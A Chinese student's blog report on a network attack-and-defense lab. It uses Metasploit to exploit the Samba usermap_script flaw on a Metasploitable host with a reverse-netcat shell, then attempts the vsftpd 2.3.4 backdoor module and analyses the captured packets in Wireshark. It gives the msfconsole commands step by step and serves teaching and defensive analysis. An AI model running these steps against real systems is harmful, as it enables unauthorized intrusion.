20212920 许邵 2021-2022-2 《网络攻防实践》实践七报告

20212920 许邵 2021-2022-2 《网络攻防实践》实践七报告

1.实践内容

1.使用Metasploit进行Linux远程渗透攻击:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。

  • Samba是什么?
    Samba是在Linux和UNIX系统上实现SMB (Server Messages Block,信息服务块)协议的一款免费软件。SMB是一种在局域网上共享文件和打印机的通信协议,它在局域网内使用Linux和Windows系统的机器之间提供文件及打印机等资源的共享服务。
  • username_script 是什么?
    Samba协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行,影响Samba的3.0.20到3.0.25rc3 版本,当使用非默认的用户名映射脚本配置选项时产生,通过指定一个包含shell元字符的用户名,攻击者能够执行任意命令。

2.攻防对抗实践:

  • 攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击;
  • 防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程。

2.实践过程

2.1 实践环境

攻击机:Kali Linux攻击机,其中装有Metasploit Framework渗透程序,IP地址为192.168.233.3
靶机:Metasploitable Ubuntu,IP地址为192.168.233.123

2.2 实践一:使用Metasploit对Linux主机进行远程渗透攻击

打开msfconsole,进入Metasploit命令行界面。

在msf的命令行中,运行命令use exploit/multi/samba/usermap_script,使用Linux靶机上的Samba服务Usermap_script安全漏洞。
运行命令show payloads,显示这个漏洞可用的负载。

如果没有选择负载,Metasploit会默认选择负载cmd/unix/reverse_netcat。
我们也可以运行命令set payload cmd/unix/reverse_netcat,手动选择这个负载。

设置攻击目标为Metasploitable ubuntu靶机。set RHOST 192.168.233.123
设置攻击者为本机set LHOST 192.168.233.3,如果不设置,系统也会默认攻击者为本机。
运行命令run,开始攻击。

输入shell,回车,进入命令行;输入ifconfig查看IP地址,发现这里显示的IP地址就是靶机的IP地址,说明我们已经成功获取到了靶机的访问权限。

2.3 实践二:攻防对抗实践

这里,我们选择vsftpd后门漏洞。
在Kali Linux攻击机中打开msfconsole,运行命令search vsftpd,搜索可用漏洞。

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

输入use exploit/unix/ftp/vsftpd_234_backdoor,选择这个漏洞。
如果没有选择载荷的话,msf6可能会自动选择一个载荷。

当然,通过运行显示载荷命令show payloads可以发现,这个漏洞只有这一个载荷。

可以运行这个指令手动选择它:set payload payload/cmd/unix/interact
设置靶机地址set RHOST 192.168.233.123
设置攻击机地址set LHOST 192.168.233.3
打开Wireshark,开始抓包监听。这里我打开了同一网络下一台winxp主机的Wireshark。
在攻击机上输入run,开始攻击。
我这里显示的情况是:目标的ProFTPD服务器成功打开,要求输入密码,过一会便自动断开连接了,并没有成功建立会话。

但是从Wireshack上抓到了一些包。

我们借此分析一下。
首先,靶机在收到攻击机的请求后,靶机的FTP协议向攻击机返回了ProFTPD的版本号1.3.1(分组编号:15)
然后,攻击机向靶机发送请求:用户是qwD3:)(分组编号:17)
之后,靶机要求攻击机提供该账户的密码(分组编号:19),攻击机向靶机提供了密码D3btk(分组编号:21)
最后,靶机的FTP服务端验证账户密码是错误的,向攻击机发送了530 Login incorrect(编号:25),然后断开了连接,未能成功建立会话。
跟踪这个TCP流,可以得到如下信息:

3.学习中遇到的问题及解决

暂未发现任何问题。

4.实践总结

通过本实验使用Usermap_script漏洞进行渗透攻击的过程,我们可以充分看出Linux系统中某些严重的漏洞的危险性,这些漏洞可能会使数据和财产受到严重损害;还让我们充分地认识到及早发现、尽早修复漏洞的重要性。

参考资料

posted @ 2022-04-25 21:08  言午召耳  阅读(46)  评论(0编辑  收藏  举报